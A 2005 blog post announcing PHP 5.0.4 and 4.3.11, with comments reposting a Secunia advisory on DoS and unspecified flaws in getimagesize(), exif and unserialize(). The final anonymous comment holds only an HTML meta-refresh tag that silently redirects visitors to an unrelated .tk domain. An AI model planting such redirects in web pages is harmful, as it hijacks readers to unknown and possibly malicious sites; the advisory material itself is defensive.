PHP update: version 5.0.4

April 01, 05 by admin

Our favorite interpreted programming language, PHP (Hypertext Preprocessor, http://www.php.net/), has just released a new version for its 5.x branch, specifically version 5.0.4.

This new version fixes recent security flaws found in versions 4.2.2, 4.3.9, 4.3.10 and 5.0.3 (other versions are probably affected as well). For some of these flaws the result of a successful attack has not been specified; others have been reported to cause a denial of service (DoS) by triggering an infinite loop on the CPU.

Upgrading to version 4.3.11 or 5.0.4 is recommended (depending on the stable branch being followed): PHP downloads

More information:

The PHP Group:
http://www.php.net/release_4_3_11.php

iDEFENSE:
http://www.idefense.com/application/poi/display?id=222&type=vulnerabilities

3 responses for this post

  1. Anonymous Says:

    TITLE:
    PHP Multiple Vulnerabilities

    SECUNIA ADVISORY ID:
    SA14792

    VERIFY ADVISORY:
    http://secunia.com/advisories/14792/

    CRITICAL:
    Moderately critical

    IMPACT:
    Unknown, DoS

    WHERE:
    From remote

    SOFTWARE:
    PHP 5.0.x
    http://secunia.com/product/3919/
    PHP 4.3.x
    http://secunia.com/product/922/
    PHP 4.2.x
    http://secunia.com/product/105/

    DESCRIPTION:
    Multiple vulnerabilities have been reported in PHP, where some have
    an unknown impact and others can be exploited by malicious people to
    cause a DoS (Denial of Service).

    1) Errors within the "php_handle_iff()" and "php_handle_jpeg()"
    functions called by the "getimagesize()" PHP function can be
    exploited to cause infinite loops and consume all available CPU
    resources via a specially crafted image.

    This has been reported in versions 4.2.2, 4.3.9, 4.3.10, and 5.0.3.
    Other versions may also be affected.

    2) Multiple unspecified security issues exist in the exif and fbsql
    extensions and in the "unserialize()" and "swf_definepoly()" PHP
    functions.

    Other bugs have also been reported where some may be security
    related.

    SOLUTION:
    Update to version 4.3.11 or 5.0.4.
    http://www.php.net/downloads.php

    PROVIDED AND/OR DISCOVERED BY:
    1) Discovered by anonymous person and reported via iDEFENSE.
    2) Reported by vendor.

    ORIGINAL ADVISORY:
    The PHP Group:
    http://www.php.net/release_4_3_11.php

    iDEFENSE:
    http://www.idefense.com/application/poi/display?id=222&type=vulnerabilities

    ----------------------------------------------------------------------

    About:
    This Advisory was delivered by Secunia as a free service to help
    everybody keeping their systems up to date against the latest
    vulnerabilities.

    Subscribe:
    http://secunia.com/secunia_security_advisories/

    Definitions: (Criticality, Where etc.)
    http://secunia.com/about_secunia_advisories/

    Please Note:
    Secunia recommends that you verify all advisories you receive by
    clicking the link.
    Secunia NEVER sends attached files with advisories.
    Secunia does not advise people to install third party patches, only
    use those supplied by the vendor.

    ----------------------------------------------------------------------

  2. Fernando Ortega Says:

    I looked at the news on php.net, but it seems either it was an outdated page, or I misunderstood the information.

    In any case the news item has already been updated, thanks.

  3. Anonymous Says:

    <meta HTTP-EQUIV="Refresh" CONTENT="0;URL=http://mbytte.tk">
